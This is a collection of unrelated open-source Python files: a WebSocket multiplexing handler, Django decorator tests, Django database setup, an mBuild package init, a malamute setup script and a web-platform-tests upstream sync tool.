self._mux_handler = mux_handler
self.setDaemon(True)
def run(self):
while True:
try:
physical_stream = self._mux_handler.physical_stream
message = physical_stream.receive_message()
if message is None:
break
# Below happens only when a data message is received.
opcode = physical_stream.get_last_received_opcode()
if opcode != common.OPCODE_BINARY:
self._mux_handler.fail_physical_connection(
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE,
'Received a text message on physical connection')
break
except ConnectionTerminatedException, e:
self._logger.debug('%s', e)
break
try:
self._mux_handler.dispatch_message(message)
except PhysicalConnectionError, e:
self._mux_handler.fail_physical_connection(
e.drop_code, e.message)
break
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
except Exception, e:
self._logger.debug(traceback.format_exc())
break
self._mux_handler.notify_reader_done()
class _Worker(threading.Thread):
"""A thread that is responsible for running the corresponding application
handler.
"""
def __init__(self, mux_handler, request):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
request: _LogicalRequest instance.
"""
threading.Thread.__init__(self)
self._logger = util.get_class_logger(self)
self._mux_handler = mux_handler
self._request = request
self.setDaemon(True)
def run(self):
self._logger.debug('Logical channel worker started. (id=%d)' %
self._request.channel_id)
try:
# Non-critical exceptions will be handled by dispatcher.
self._mux_handler.dispatcher.transfer_data(self._request)
except LogicalChannelError, e:
self._mux_handler.fail_logical_channel(
e.channel_id, e.drop_code, e.message)
finally:
self._mux_handler.notify_worker_done(self._request.channel_id)
class _MuxHandshaker(hybi.Handshaker):
"""Opening handshake processor for multiplexing."""
_DUMMY_WEBSOCKET_KEY = 'dGhlIHNhbXBsZSBub25jZQ=='
def __init__(self, request, dispatcher, send_quota, receive_quota):
"""Constructs an instance.
Args:
request: _LogicalRequest instance.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
send_quota: Initial send quota.
receive_quota: Initial receive quota.
"""
hybi.Handshaker.__init__(self, request, dispatcher)
self._send_quota = send_quota
self._receive_quota = receive_quota
# Append headers which should not be included in handshake field of
# AddChannelRequest.
# TODO(bashi): Make sure whether we should raise exception when
# these headers are included already.
request.headers_in[common.UPGRADE_HEADER] = (
common.WEBSOCKET_UPGRADE_TYPE)
request.headers_in[common.SEC_WEBSOCKET_VERSION_HEADER] = (
str(common.VERSION_HYBI_LATEST))
request.headers_in[common.SEC_WEBSOCKET_KEY_HEADER] = (
self._DUMMY_WEBSOCKET_KEY)
def _create_stream(self, stream_options):
"""Override hybi.Handshaker._create_stream."""
self._logger.debug('Creating logical stream for %d' %
self._request.channel_id)
return _LogicalStream(
self._request, stream_options, self._send_quota,
self._receive_quota)
def _create_handshake_response(self, accept):
"""Override hybi._create_handshake_response."""
response = []
response.append('HTTP/1.1 101 Switching Protocols\r\n')
# Upgrade and Sec-WebSocket-Accept should be excluded.
response.append('%s: %s\r\n' % (
common.CONNECTION_HEADER, common.UPGRADE_CONNECTION_TYPE))
if self._request.ws_protocol is not None:
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_PROTOCOL_HEADER,
self._request.ws_protocol))
if (self._request.ws_extensions is not None and
len(self._request.ws_extensions) != 0):
response.append('%s: %s\r\n' % (
common.SEC_WEBSOCKET_EXTENSIONS_HEADER,
common.format_extensions(self._request.ws_extensions)))
response.append('\r\n')
return ''.join(response)
def _send_handshake(self, accept):
"""Override hybi.Handshaker._send_handshake."""
# Don't send handshake response for the default channel
if self._request.channel_id == _DEFAULT_CHANNEL_ID:
return
handshake_response = self._create_handshake_response(accept)
frame_data = _create_add_channel_response(
self._request.channel_id,
handshake_response)
self._logger.debug('Sending handshake response for %d: %r' %
(self._request.channel_id, frame_data))
self._request.connection.write_control_data(frame_data)
class _LogicalChannelData(object):
"""A structure that holds information about logical channel.
"""
def __init__(self, request, worker):
self.request = request
self.worker = worker
self.drop_code = _DROP_CODE_NORMAL_CLOSURE
self.drop_message = ''
class _HandshakeDeltaBase(object):
"""A class that holds information for delta-encoded handshake."""
def __init__(self, headers):
self._headers = headers
def create_headers(self, delta=None):
"""Creates request headers for an AddChannelRequest that has
delta-encoded handshake.
Args:
delta: headers should be overridden.
"""
headers = copy.copy(self._headers)
if delta:
for key, value in delta.items():
# The spec requires that a header with an empty value is
# removed from the delta base.
if len(value) == 0 and headers.has_key(key):
del headers[key]
else:
headers[key] = value
return headers
class _MuxHandler(object):
"""Multiplexing handler. When a handler starts, it launches three
threads; the reader thread, the writer thread, and a worker thread.
The reader thread reads data from the physical stream, i.e., the
ws_stream object of the underlying websocket connection. The reader
thread interprets multiplexed frames and dispatches them to logical
channels. Methods of this class are mostly called by the reader thread.
The writer thread sends multiplexed frames which are created by
logical channels via the physical connection.
The worker thread launched at the starting point handles the
"Implicitly Opened Connection". If multiplexing handler receives
an AddChannelRequest and accepts it, the handler will launch a new worker
thread and dispatch the request to it.
"""
def __init__(self, request, dispatcher):
"""Constructs an instance.
Args:
request: mod_python request of the physical connection.
dispatcher: Dispatcher instance (dispatch.Dispatcher).
"""
self.original_request = request
self.dispatcher = dispatcher
self.physical_connection = request.connection
self.physical_stream = request.ws_stream
self._logger = util.get_class_logger(self)
self._logical_channels = {}
self._logical_channels_condition = threading.Condition()
# Holds client's initial quota
self._channel_slots = collections.deque()
self._handshake_base = None
self._worker_done_notify_received = False
self._reader = None
self._writer = None
def start(self):
"""Starts the handler.
Raises:
MuxUnexpectedException: when the handler already started, or when
opening handshake of the default channel fails.
"""
if self._reader or self._writer:
raise MuxUnexpectedException('MuxHandler already started')
self._reader = _PhysicalConnectionReader(self)
self._writer = _PhysicalConnectionWriter(self)
self._reader.start()
self._writer.start()
# Create "Implicitly Opened Connection".
logical_connection = _LogicalConnection(self, _DEFAULT_CHANNEL_ID)
headers = copy.copy(self.original_request.headers_in)
# Add extensions for logical channel.
headers[common.SEC_WEBSOCKET_EXTENSIONS_HEADER] = (
common.format_extensions(
self.original_request.mux_processor.extensions()))
self._handshake_base = _HandshakeDeltaBase(headers)
logical_request = _LogicalRequest(
_DEFAULT_CHANNEL_ID,
self.original_request.method,
self.original_request.uri,
self.original_request.protocol,
self._handshake_base.create_headers(),
logical_connection)
# Client's send quota for the implicitly opened connection is zero,
# but we will send FlowControl later so set the initial quota to
# _INITIAL_QUOTA_FOR_CLIENT.
self._channel_slots.append(_INITIAL_QUOTA_FOR_CLIENT)
send_quota = self.original_request.mux_processor.quota()
if not self._do_handshake_for_logical_request(
logical_request, send_quota=send_quota):
raise MuxUnexpectedException(
'Failed handshake on the default channel id')
self._add_logical_channel(logical_request)
# Send FlowControl for the implicitly opened connection.
frame_data = _create_flow_control(_DEFAULT_CHANNEL_ID,
_INITIAL_QUOTA_FOR_CLIENT)
logical_request.connection.write_control_data(frame_data)
def add_channel_slots(self, slots, send_quota):
"""Adds channel slots.
Args:
slots: number of slots to be added.
send_quota: initial send quota for slots.
"""
self._channel_slots.extend([send_quota] * slots)
# Send NewChannelSlot to client.
frame_data = _create_new_channel_slot(slots, send_quota)
self.send_control_data(frame_data)
def wait_until_done(self, timeout=None):
"""Waits until all workers are done. Returns False when timeout has
occurred. Returns True on success.
Args:
timeout: timeout in sec.
"""
self._logical_channels_condition.acquire()
try:
while len(self._logical_channels) > 0:
self._logger.debug('Waiting workers(%d)...' %
len(self._logical_channels))
self._worker_done_notify_received = False
self._logical_channels_condition.wait(timeout)
if not self._worker_done_notify_received:
self._logger.debug('Waiting worker(s) timed out')
return False
finally:
self._logical_channels_condition.release()
# Flush pending outgoing data
self._writer.stop()
self._writer.join()
return True
def notify_write_data_done(self, channel_id):
"""Called by the writer thread when a write operation has done.
Args:
channel_id: objective channel id.
"""
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
channel_data.request.connection.on_write_data_done()
else:
self._logger.debug('Seems that logical channel for %d has gone'
% channel_id)
finally:
self._logical_channels_condition.release()
def send_control_data(self, data):
"""Sends data via the control channel.
Args:
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=_CONTROL_CHANNEL_ID, data=data))
def send_data(self, channel_id, data):
"""Sends data via given logical channel. This method is called by
worker threads.
Args:
channel_id: objective channel id.
data: data to be sent.
"""
self._writer.put_outgoing_data(_OutgoingData(
channel_id=channel_id, data=data))
def _send_drop_channel(self, channel_id, code=None, message=''):
frame_data = _create_drop_channel(channel_id, code, message)
self._logger.debug(
'Sending drop channel for channel id %d' % channel_id)
self.send_control_data(frame_data)
def _send_error_add_channel_response(self, channel_id, status=None):
if status is None:
status = common.HTTP_STATUS_BAD_REQUEST
if status in _HTTP_BAD_RESPONSE_MESSAGES:
message = _HTTP_BAD_RESPONSE_MESSAGES[status]
else:
self._logger.debug('Response message for %d is not found' % status)
message = '???'
response = 'HTTP/1.1 %d %s\r\n\r\n' % (status, message)
frame_data = _create_add_channel_response(channel_id,
encoded_handshake=response,
encoding=0, rejected=True)
self.send_control_data(frame_data)
def _create_logical_request(self, block):
if block.channel_id == _CONTROL_CHANNEL_ID:
# TODO(bashi): Raise PhysicalConnectionError with code 2006
# instead of MuxUnexpectedException.
raise MuxUnexpectedException(
'Received the control channel id (0) as objective channel '
'id for AddChannel')
if block.encoding > _HANDSHAKE_ENCODING_DELTA:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_REQUEST_ENCODING)
method, path, version, headers = _parse_request_text(
block.encoded_handshake)
if block.encoding == _HANDSHAKE_ENCODING_DELTA:
headers = self._handshake_base.create_headers(headers)
connection = _LogicalConnection(self, block.channel_id)
request = _LogicalRequest(block.channel_id, method, path, version,
headers, connection)
return request
def _do_handshake_for_logical_request(self, request, send_quota=0):
try:
receive_quota = self._channel_slots.popleft()
except IndexError:
raise LogicalChannelError(
request.channel_id, _DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION)
handshaker = _MuxHandshaker(request, self.dispatcher,
send_quota, receive_quota)
try:
handshaker.do_handshake()
except handshake.VersionException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(
request.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return False
except handshake.HandshakeException, e:
# TODO(bashi): Should we _Fail the Logical Channel_ with 3001
# instead?
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id,
status=e.status)
return False
except handshake.AbortedByUserException, e:
self._logger.info('%s', e)
self._send_error_add_channel_response(request.channel_id)
return False
return True
def _add_logical_channel(self, logical_request):
try:
self._logical_channels_condition.acquire()
if logical_request.channel_id in self._logical_channels:
self._logger.debug('Channel id %d already exists' %
logical_request.channel_id)
raise PhysicalConnectionError(
_DROP_CODE_CHANNEL_ALREADY_EXISTS,
'Channel id %d already exists' %
logical_request.channel_id)
worker = _Worker(self, logical_request)
channel_data = _LogicalChannelData(logical_request, worker)
self._logical_channels[logical_request.channel_id] = channel_data
worker.start()
finally:
self._logical_channels_condition.release()
def _process_add_channel_request(self, block):
try:
logical_request = self._create_logical_request(block)
except ValueError, e:
self._logger.debug('Failed to create logical request: %r' % e)
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
return
if self._do_handshake_for_logical_request(logical_request):
if block.encoding == _HANDSHAKE_ENCODING_IDENTITY:
# Update handshake base.
# TODO(bashi): Make sure this is the right place to update
# handshake base.
self._handshake_base = _HandshakeDeltaBase(
logical_request.headers_in)
self._add_logical_channel(logical_request)
else:
self._send_error_add_channel_response(
block.channel_id, status=common.HTTP_STATUS_BAD_REQUEST)
def _process_flow_control(self, block):
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.request.ws_stream.replenish_send_quota(
block.send_quota)
finally:
self._logical_channels_condition.release()
def _process_drop_channel(self, block):
self._logger.debug(
'DropChannel received for %d: code=%r, reason=%r' %
(block.channel_id, block.drop_code, block.drop_message))
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
return
channel_data = self._logical_channels[block.channel_id]
channel_data.drop_code = _DROP_CODE_ACKNOWLEDGED
# Close the logical channel
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
finally:
self._logical_channels_condition.release()
def _process_control_blocks(self, parser):
for control_block in parser.read_control_blocks():
opcode = control_block.opcode
self._logger.debug('control block received, opcode: %d' % opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
self._process_add_channel_request(control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received AddChannelResponse')
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
self._process_flow_control(control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
self._process_drop_channel(control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Received NewChannelSlot')
else:
raise MuxUnexpectedException(
'Unexpected opcode %r' % opcode)
def _process_logical_frame(self, channel_id, parser):
self._logger.debug('Received a frame. channel id=%d' % channel_id)
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
# We must ignore the message for an inactive channel.
return
channel_data = self._logical_channels[channel_id]
fin, rsv1, rsv2, rsv3, opcode, payload = parser.read_inner_frame()
consuming_byte = len(payload)
if opcode != common.OPCODE_CONTINUATION:
consuming_byte += 1
if not channel_data.request.ws_stream.consume_receive_quota(
consuming_byte):
# The client violates quota. Close logical channel.
raise LogicalChannelError(
channel_id, _DROP_CODE_SEND_QUOTA_VIOLATION)
header = create_header(opcode, len(payload), fin, rsv1, rsv2, rsv3,
mask=False)
frame_data = header + payload
channel_data.request.connection.append_frame_data(frame_data)
finally:
self._logical_channels_condition.release()
def dispatch_message(self, message):
"""Dispatches message. The reader thread calls this method.
Args:
message: a message that contains encapsulated frame.
Raises:
PhysicalConnectionError: if the message contains physical
connection level errors.
LogicalChannelError: if the message contains logical channel
level errors.
"""
parser = _MuxFramePayloadParser(message)
try:
channel_id = parser.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_CHANNEL_ID_TRUNCATED)
if channel_id == _CONTROL_CHANNEL_ID:
self._process_control_blocks(parser)
else:
self._process_logical_frame(channel_id, parser)
def notify_worker_done(self, channel_id):
"""Called when a worker has finished.
Args:
channel_id: channel id corresponded with the worker.
"""
self._logger.debug('Worker for channel id %d terminated' % channel_id)
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise MuxUnexpectedException(
'Channel id %d not found' % channel_id)
channel_data = self._logical_channels.pop(channel_id)
finally:
self._worker_done_notify_received = True
self._logical_channels_condition.notify()
self._logical_channels_condition.release()
if not channel_data.request.server_terminated:
self._send_drop_channel(
channel_id, code=channel_data.drop_code,
message=channel_data.drop_message)
def notify_reader_done(self):
"""This method is called by the reader thread when the reader has
finished.
"""
self._logger.debug(
'Termiating all logical connections waiting for incoming data '
'...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def notify_writer_done(self):
"""This method is called by the writer thread when the writer has
finished.
"""
self._logger.debug(
'Termiating all logical connections waiting for write '
'completion ...')
self._logical_channels_condition.acquire()
for channel_data in self._logical_channels.values():
try:
channel_data.request.connection.on_writer_done()
except Exception:
self._logger.debug(traceback.format_exc())
self._logical_channels_condition.release()
def fail_physical_connection(self, code, message):
"""Fail the physical connection.
Args:
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing the physical connection...')
self._send_drop_channel(_CONTROL_CHANNEL_ID, code, message)
self._writer.stop(common.STATUS_INTERNAL_ENDPOINT_ERROR)
def fail_logical_channel(self, channel_id, code, message):
"""Fail a logical channel.
Args:
channel_id: channel id.
code: drop reason code.
message: drop message.
"""
self._logger.debug('Failing logical channel %d...' % channel_id)
try:
self._logical_channels_condition.acquire()
if channel_id in self._logical_channels:
channel_data = self._logical_channels[channel_id]
# Close the logical channel. notify_worker_done() will be
# called later and it will send DropChannel.
channel_data.drop_code = code
channel_data.drop_message = message
channel_data.request.connection.set_read_state(
_LogicalConnection.STATE_TERMINATED)
channel_data.request.ws_stream.stop_sending()
else:
self._send_drop_channel(channel_id, code, message)
finally:
self._logical_channels_condition.release()
def use_mux(request):
return hasattr(request, 'mux_processor') and (
request.mux_processor.is_active())
def start(request, dispatcher):
mux_handler = _MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(_INITIAL_NUMBER_OF_CHANNEL_SLOTS,
_INITIAL_QUOTA_FOR_CLIENT)
mux_handler.wait_until_done()
# vi:sts=4 sw=4 et
|
wagnerand/olympia | refs/heads/master | src/olympia/amo/tests/test_decorators.py | 4 | from datetime import datetime, timedelta
from django import http
from django.contrib.auth.models import AnonymousUser
from django.core.exceptions import PermissionDenied
from django.test import RequestFactory
import mock
import pytest
from olympia import amo
from olympia.amo import decorators
from olympia.amo.tests import BaseTestCase, TestCase, fxa_login_link
from olympia.users.models import UserProfile
pytestmark = pytest.mark.django_db
def test_post_required():
def func(request):
return mock.sentinel.response
g = decorators.post_required(func)
request = mock.Mock()
request.method = 'GET'
assert isinstance(g(request), http.HttpResponseNotAllowed)
request.method = 'POST'
assert g(request) == mock.sentinel.response
def test_json_view():
"""Turns a Python object into a response."""
def func(request):
return {'x': 1}
response = decorators.json_view(func)(mock.Mock())
assert isinstance(response, http.HttpResponse)
assert response.content == '{"x": 1}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 200
def test_json_view_normal_response():
"""Normal responses get passed through."""
expected = http.HttpResponseForbidden()
def func(request):
return expected
response = decorators.json_view(func)(mock.Mock())
assert expected is response
assert response['Content-Type'] == 'text/html; charset=utf-8'
def test_json_view_error():
"""json_view.error returns 400 responses."""
response = decorators.json_view.error({'msg': 'error'})
assert isinstance(response, http.HttpResponseBadRequest)
assert response.content == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
def test_json_view_status():
def func(request):
return {'x': 1}
response = decorators.json_view(func, status_code=202)(mock.Mock())
assert response.status_code == 202
def test_json_view_response_status():
response = decorators.json_response({'msg': 'error'}, status_code=202)
assert response.content == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 202
class TestLoginRequired(BaseTestCase):
def setUp(self):
super(TestLoginRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = RequestFactory().get('/path')
self.request.user = AnonymousUser()
self.request.session = {}
def test_normal(self):
func = decorators.login_required(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 302
assert response['Location'] == fxa_login_link(
request=self.request, to='/path')
def test_no_redirect(self):
func = decorators.login_required(self.f, redirect=False)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_decorator_syntax(self):
# @login_required(redirect=False)
func = decorators.login_required(redirect=False)(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_no_redirect_success(self):
func = decorators.login_required(redirect=False)(self.f)
self.request.user = UserProfile()
func(self.request)
assert self.f.called
class TestSetModifiedOn(TestCase):
fixtures = ['base/users']
@decorators.set_modified_on
def some_method(self, worked):
return worked
def test_set_modified_on(self):
user = UserProfile.objects.latest('pk')
self.some_method(
True, set_modified_on=user.serializable_reference())
assert UserProfile.objects.get(pk=user.pk).modified.date() == (
datetime.today().date())
def test_not_set_modified_on(self):
yesterday = datetime.today() - timedelta(days=1)
qs = UserProfile.objects.all()
qs.update(modified=yesterday)
user = qs.latest('pk')
self.some_method(
False, set_modified_on=user.serializable_reference())
date = UserProfile.objects.get(pk=user.pk).modified.date()
assert date < datetime.today().date()
class TestPermissionRequired(TestCase):
empty_permission = amo.permissions.NONE
def setUp(self):
super(TestPermissionRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = mock.Mock()
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_not_allowed(self, action_allowed):
action_allowed.return_value = False
func = decorators.permission_required(self.empty_permission)(self.f)
with self.assertRaises(PermissionDenied):
func(self.request)
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed(self, action_allowed):
action_allowed.return_value = True
func = decorators.permission_required(self.empty_permission)(self.f)
func(self.request)
assert self.f.called
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed_correctly(self, action_allowed):
func = decorators.permission_required(
amo.permissions.ANY_ADMIN)(self.f)
func(self.request)
action_allowed.assert_called_with(
self.request, amo.permissions.AclPermission('Admin', '%'))
|
pwoodworth/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/db/__init__.py | 94 | from django.conf import settings
from django.core import signals
from django.core.exceptions import ImproperlyConfigured
from django.db.utils import ConnectionHandler, ConnectionRouter, load_backend, DEFAULT_DB_ALIAS, \
DatabaseError, IntegrityError
from django.utils.functional import curry
__all__ = ('backend', 'connection', 'connections', 'router', 'DatabaseError',
'IntegrityError', 'DEFAULT_DB_ALIAS')
# For backwards compatibility - Port any old database settings over to
# the new values.
if not settings.DATABASES:
import warnings
warnings.warn(
"settings.DATABASE_* is deprecated; use settings.DATABASES instead.",
DeprecationWarning
)
settings.DATABASES[DEFAULT_DB_ALIAS] = {
'ENGINE': settings.DATABASE_ENGINE,
'HOST': settings.DATABASE_HOST,
'NAME': settings.DATABASE_NAME,
'OPTIONS': settings.DATABASE_OPTIONS,
'PASSWORD': settings.DATABASE_PASSWORD,
'PORT': settings.DATABASE_PORT,
'USER': settings.DATABASE_USER,
'TEST_CHARSET': settings.TEST_DATABASE_CHARSET,
'TEST_COLLATION': settings.TEST_DATABASE_COLLATION,
'TEST_NAME': settings.TEST_DATABASE_NAME,
}
if DEFAULT_DB_ALIAS not in settings.DATABASES:
raise ImproperlyConfigured("You must define a '%s' database" % DEFAULT_DB_ALIAS)
for alias, database in settings.DATABASES.items():
if 'ENGINE' not in database:
raise ImproperlyConfigured("You must specify a 'ENGINE' for database '%s'" % alias)
if database['ENGINE'] in ("postgresql", "postgresql_psycopg2", "sqlite3", "mysql", "oracle"):
import warnings
if 'django.contrib.gis' in settings.INSTALLED_APPS:
warnings.warn(
"django.contrib.gis is now implemented as a full database backend. "
"Modify ENGINE in the %s database configuration to select "
"a backend from 'django.contrib.gis.db.backends'" % alias,
DeprecationWarning
)
if database['ENGINE'] == 'postgresql_psycopg2':
full_engine = 'django.contrib.gis.db.backends.postgis'
elif database['ENGINE'] == 'sqlite3':
full_engine = 'django.contrib.gis.db.backends.spatialite'
else:
full_engine = 'django.contrib.gis.db.backends.%s' % database['ENGINE']
else:
warnings.warn(
"Short names for ENGINE in database configurations are deprecated. "
"Prepend %s.ENGINE with 'django.db.backends.'" % alias,
DeprecationWarning
)
full_engine = "django.db.backends.%s" % database['ENGINE']
database['ENGINE'] = full_engine
connections = ConnectionHandler(settings.DATABASES)
router = ConnectionRouter(settings.DATABASE_ROUTERS)
# `connection`, `DatabaseError` and `IntegrityError` are convenient aliases
# for backend bits.
# DatabaseWrapper.__init__() takes a dictionary, not a settings module, so
# we manually create the dictionary from the settings, passing only the
# settings that the database backends care about. Note that TIME_ZONE is used
# by the PostgreSQL backends.
# we load all these up for backwards compatibility, you should use
# connections['default'] instead.
connection = connections[DEFAULT_DB_ALIAS]
backend = load_backend(connection.settings_dict['ENGINE'])
# Register an event that closes the database connection
# when a Django request is finished.
def close_connection(**kwargs):
for conn in connections.all():
conn.close()
signals.request_finished.connect(close_connection)
# Register an event that resets connection.queries
# when a Django request is started.
def reset_queries(**kwargs):
for conn in connections.all():
conn.queries = []
signals.request_started.connect(reset_queries)
# Register an event that rolls back the connections
# when a Django request has an exception.
def _rollback_on_exception(**kwargs):
from django.db import transaction
for conn in connections:
try:
transaction.rollback_unless_managed(using=conn)
except DatabaseError:
pass
signals.got_request_exception.connect(_rollback_on_exception)
|
mosdef-hub/mbuild | refs/heads/master | mbuild/lib/molecules/__init__.py | 2 | """Library of molecules for mBuild."""
from mbuild.lib.molecules.ethane import Ethane
from mbuild.lib.molecules.methane import Methane
from mbuild.lib.molecules.water import (
WaterSPC,
WaterTIP3P,
WaterTIP4P,
WaterTIP4P2005,
WaterTIP4PIce,
)
|
lnls-dig/malamute | refs/heads/master | bindings/python/setup.py | 4 | ################################################################################
# THIS FILE IS 100% GENERATED BY ZPROJECT; DO NOT EDIT EXCEPT EXPERIMENTALLY #
# Read the zproject/README.md for information about making permanent changes. #
################################################################################
from setuptools import setup
setup(
name = "malamute",
version = "1.1.0",
license = "mpl-2.0",
description = """Python bindings of: zeromq message broker""",
url = "https://github.com/zeromq/malamute",
packages = ["malamute"],
install_requires = [
"czmq",
],
)
################################################################################
# THIS FILE IS 100% GENERATED BY ZPROJECT; DO NOT EDIT EXCEPT EXPERIMENTALLY #
# Read the zproject/README.md for information about making permanent changes. #
################################################################################
|
wartman4404/servo | refs/heads/master | tests/wpt/update/upstream.py | 43 | import os
import re
import subprocess
import sys
import urlparse
from wptrunner.update.sync import LoadManifest
from wptrunner.update.tree import get_unique_name
from wptrunner.update.base import Step, StepRunner, exit_clean, exit_unclean
from .tree import Commit, GitTree, Patch
import github
from .github import GitHub
def rewrite_patch(patch, strip_dir):
"""Take a Patch and convert to a different repository by stripping a prefix from the
file paths. Also rewrite the message to remove the bug number and reviewer, but add
a bugzilla link in the summary.
:param patch: the Patch to convert
:param strip_dir: the path prefix to remove
"""
if not strip_dir.startswith("/"):
strip_dir = "/%s"% strip_dir
new_diff = []
line_starts = ["diff ", "+++ ", "--- "]
for line in patch.diff.split("\n"):
for start in line_starts:
if line.startswith(start):
new_diff.append(line.replace(strip_dir, "").encode("utf8"))
break
else:
new_diff.append(line)
new_diff = "\n".join(new_diff)
assert new_diff != patch
return Patch(patch.author, patch.email, rewrite_message(patch), new_diff)
def rewrite_message(patch):
rest = patch.message.body
if patch.message.bug is not None:
return "\n".join([patch.message.summary,
patch.message.body,
"",
"Upstreamed from https://bugzilla.mozilla.org/show_bug.cgi?id=%s" %
patch.message.bug])
return "\n".join([patch.message.full_summary, rest])
class SyncToUpstream(Step):
"""Sync local changes to upstream"""
def create(self, state):
if not state.kwargs["upstream"]:
return
if not isinstance(state.local_tree, GitTree):
self.logger.error("Cannot sync with upstream from a non-Git checkout.")
return exit_clean
try:
import requests
except ImportError:
self.logger.error("Upstream sync requires the requests module to be installed")
return exit_clean
if not state.sync_tree:
os.makedirs(state.sync["path"])
state.sync_tree = GitTree(root=state.sync["path"])
kwargs = state.kwargs
with state.push(["local_tree", "sync_tree", "tests_path", "metadata_path",
"sync"]):
state.token = kwargs["token"]
runner = SyncToUpstreamRunner(self.logger, state)
runner.run()
class CheckoutBranch(Step):
"""Create a branch in the sync tree pointing at the last upstream sync commit
and check it out"""
provides = ["branch"]
def create(self, state):
self.logger.info("Updating sync tree from %s" % state.sync["remote_url"])
state.branch = state.sync_tree.unique_branch_name(
"outbound_update_%s" % state.test_manifest.rev)
state.sync_tree.update(state.sync["remote_url"],
state.sync["branch"],
state.branch)
state.sync_tree.checkout(state.test_manifest.rev, state.branch, force=True)
class GetLastSyncCommit(Step):
"""Find the gecko commit at which we last performed a sync with upstream."""
provides = ["last_sync_path", "last_sync_commit"]
def create(self, state):
self.logger.info("Looking for last sync commit")
state.last_sync_path = os.path.join(state.metadata_path, "mozilla-sync")
with open(state.last_sync_path) as f:
last_sync_sha1 = f.read().strip()
state.last_sync_commit = Commit(state.local_tree, last_sync_sha1)
if not state.local_tree.contains_commit(state.last_sync_commit):
self.logger.error("Could not find last sync commit %s" % last_sync_sha1)
return exit_clean
self.logger.info("Last sync to web-platform-tests happened in %s" % state.last_sync_commit.sha1)
class GetBaseCommit(Step):
"""Find the latest upstream commit on the branch that we are syncing with"""
provides = ["base_commit"]
def create(self, state):
state.base_commit = state.sync_tree.get_remote_sha1(state.sync["remote_url"],
state.sync["branch"])
self.logger.debug("New base commit is %s" % state.base_commit.sha1)
class LoadCommits(Step):
"""Get a list of commits in the gecko tree that need to be upstreamed"""
provides = ["source_commits"]
def create(self, state):
state.source_commits = state.local_tree.log(state.last_sync_commit,
state.tests_path)
update_regexp = re.compile("Bug \d+ - Update web-platform-tests to revision [0-9a-f]{40}")
for i, commit in enumerate(state.source_commits[:]):
if update_regexp.match(commit.message.text):
# This is a previous update commit so ignore it
state.source_commits.remove(commit)
continue
if commit.message.backouts:
#TODO: Add support for collapsing backouts
raise NotImplementedError("Need to get the Git->Hg commits for backouts and remove the backed out patch")
if not commit.message.bug:
self.logger.error("Commit %i (%s) doesn't have an associated bug number." %
(i + 1, commit.sha1))
return exit_unclean
self.logger.debug("Source commits: %s" % state.source_commits)
class SelectCommits(Step):
"""Provide a UI to select which commits to upstream"""
def create(self, state):
if not state.source_commits:
return
while True:
commits = state.source_commits[:]
for i, commit in enumerate(commits):
print "%i:\t%s" % (i, commit.message.summary)
remove = raw_input("Provide a space-separated list of any commits numbers to remove from the list to upstream:\n").strip()
remove_idx = set()
invalid = False
for item in remove.split(" "):
try:
item = int(item)
except:
invalid = True
break
if item < 0 or item >= len(commits):
invalid = True
break
remove_idx.add(item)
if invalid:
continue
keep_commits = [(i,cmt) for i,cmt in enumerate(commits) if i not in remove_idx]
#TODO: consider printed removed commits
print "Selected the following commits to keep:"
for i, commit in keep_commits:
print "%i:\t%s" % (i, commit.message.summary)
confirm = raw_input("Keep the above commits? y/n\n").strip().lower()
if confirm == "y":
state.source_commits = [item[1] for item in keep_commits]
break
class MovePatches(Step):
"""Convert gecko commits into patches against upstream and commit these to the sync tree."""
provides = ["commits_loaded"]
def create(self, state):
state.commits_loaded = 0
strip_path = os.path.relpath(state.tests_path,
state.local_tree.root)
self.logger.debug("Stripping patch %s" % strip_path)
